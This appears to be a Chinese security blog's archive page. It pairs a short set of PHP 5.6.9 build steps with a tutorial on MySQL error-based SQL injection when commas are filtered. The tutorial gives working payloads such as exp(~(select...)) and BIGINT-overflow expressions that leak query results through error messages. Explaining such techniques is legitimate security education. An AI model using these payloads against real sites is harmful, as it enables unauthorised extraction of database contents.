5月, 2015 | 李劼杰的博客

php -v #可以先检查下自己当前的版本 apt-get install libxml2-dev apt-get install apache2-dev wget http://cn2.php.net/distributions/php-5.6.9.tar.bz2 tar -xvf php-5.6.9.tar.bz2 cd php-5.6.9/ which apxs # 确认找到apxs的路径 ./configure --with-apxs2=`which apxs` --with-mysql make make install php -v #再次检查php的版本 cp .libs/libphp5.so /usr/lib/apache2/modules/ service apache2 restart

这一篇介绍不带逗号注入。之所以不带逗号，多半是因为它被当做分隔符，或者是被脚本过滤了。比如这样一个URL：

http://www.target.com/index.php?cate=1,2,3,4,5

参数cate可以注入，但是不能使用逗号，因为逗号被脚本作为分隔符预处理。

这种注射点的利用方法是使用数学运算函数在子查询中报错，比如exp函数（参考 EXP(X) ）, MySQL会把子查询的中间结果暴露出来。

这里我发了一个例子到wooyun: 17173游戏某站点MySQL报错注入(不带逗号注入的猜解过程)

select exp(~(select*from(select user())a))

MySQL报错：

mysql> select exp(~(select*from(select user())a));
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’

这样我们就得到了当前user()是root@localhost。

exp(x)函数的作用：取常数e的x次方，其中，e是自然对数的底。

~x 是一个一元运算符，将x按位取补。举个例子：

mysql> select hex(2);
+——–+
| hex(2) |
+——–+
| 2 |
+——–+

mysql> select hex(~2);
+——————+
| hex(~2) |
+——————+
| FFFFFFFFFFFFFFFD |
+——————+

这条查询会出错，是因为exp(x)的参数x过大，超过了数值范围。分解到子查询，就是：

1. (select*from(select user())a) 得到字符串 root@localhost

2. 表达式’root@localhost’被转换为0，按位取补之后得到一个非常的大数，它是MySQL中最大的无符号整数：

mysql> select ~0;
+———————-+
| ~0 |
+———————-+
| 18446744073709551615 |
+———————-+

3. exp无法计算e的18446744073709551615次方，最终报错，但是MySQL把前面 1) 中子查询的临时结果暴露出来了

了解了MySQL的这个特点，其实我们就还可以精心构造其他的一元运算符，让MySQL查询在没有逗号的情况下报错，比如：

mysql> select !(select*from(select user())x)-~0;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in ‘((not((select ‘root@localhost’ from dual))) – ~(0))’

mysql> select 1 – 18446744073709551615;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in ‘(1 – 18446744073709551615)’

原因如第二个查询所述。

这个例子是bigint超过数值范围，手法类似。

月度归档： 2015年5月

Ubuntu安装php5.6.9免疫Multipart/form-data远程拒绝服务漏洞

MySQL注射的过滤绕过技巧[3]